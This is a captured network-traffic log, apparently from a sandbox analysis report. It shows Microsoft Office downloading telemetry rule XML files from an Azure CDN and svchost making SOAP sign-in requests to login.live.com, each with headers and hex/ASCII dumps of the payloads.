                                                                          2024-12-08 19:51:29 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          101192.168.2.44986413.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:29 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:29 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:29 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 423
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                          ETag: "0x8DC582BB7564CE8"
                                                                          x-ms-request-id: c11f8514-901e-0048-1305-48b800000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195129Z-r1cf579d778dndrdhC1EWR4b2400000005w0000000007ta4
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:29 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          102192.168.2.44986520.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:30 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 4775
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:30 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:31 UTC569INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:30 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C510_BAY
                                                                          x-ms-request-id: 473eb0aa-77e4-43d0-b2c5-5e598bbbec09
                                                                          PPServer: PPV: 30 H: PH1PEPF0001B788 V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:30 GMT
                                                                          Connection: close
                                                                          Content-Length: 11410
                                                                          2024-12-08 19:51:31 UTC11410INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          103192.168.2.44986613.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:30 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:30 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:30 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 478
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                          ETag: "0x8DC582B9B233827"
                                                                          x-ms-request-id: d196cbd9-901e-008f-5d03-4867a6000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195130Z-r1cf579d778mvsklhC1EWRkavg00000006h0000000005hba
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:30 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          104192.168.2.44986713.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:30 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:31 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:31 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 404
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                          ETag: "0x8DC582B95C61A3C"
                                                                          x-ms-request-id: 074afca8-301e-0096-464a-49e71d000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195131Z-r1cf579d778t5c2lhC1EWRce3w00000006wg000000007syt
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:31 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          105192.168.2.44986813.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:31 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:31 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:31 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 468
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                          ETag: "0x8DC582BB046B576"
                                                                          x-ms-request-id: d196cbda-901e-008f-5e03-4867a6000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195131Z-r1cf579d778t5c2lhC1EWRce3w00000006xg000000005qcm
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:31 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          106192.168.2.44987013.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:31 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:31 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:31 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 479
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                          ETag: "0x8DC582BB7D702D0"
                                                                          x-ms-request-id: 30883f21-801e-00a0-1802-482196000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195131Z-r1cf579d7789trgthC1EWRkkfc00000006wg000000007nqc
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:31 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          107192.168.2.44986913.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:31 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:31 UTC491INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:31 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 400
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                          ETag: "0x8DC582BB2D62837"
                                                                          x-ms-request-id: 8bff590b-501e-0064-7d90-491f54000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195131Z-r1cf579d778pftsbhC1EWRa0gn00000000qg0000000091t2
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          X-Cache-Info: L1_T2
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:31 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          108192.168.2.44987620.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:32 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 4831
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:32 UTC4831OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:33 UTC569INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:32 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C510_BL2
                                                                          x-ms-request-id: b7037a5f-83b1-4a94-a412-6c44180bf46f
                                                                          PPServer: PPV: 30 H: BL02EPF0001D762 V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:32 GMT
                                                                          Connection: close
                                                                          Content-Length: 11197
                                                                          2024-12-08 19:51:33 UTC11197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          109192.168.2.44987213.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:32 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:33 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:32 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 425
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                          ETag: "0x8DC582BBA25094F"
                                                                          x-ms-request-id: c9f0d292-501e-0047-460d-49ce6c000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195132Z-r1cf579d778dc6d7hC1EWR2vs8000000070000000000411e
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:33 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
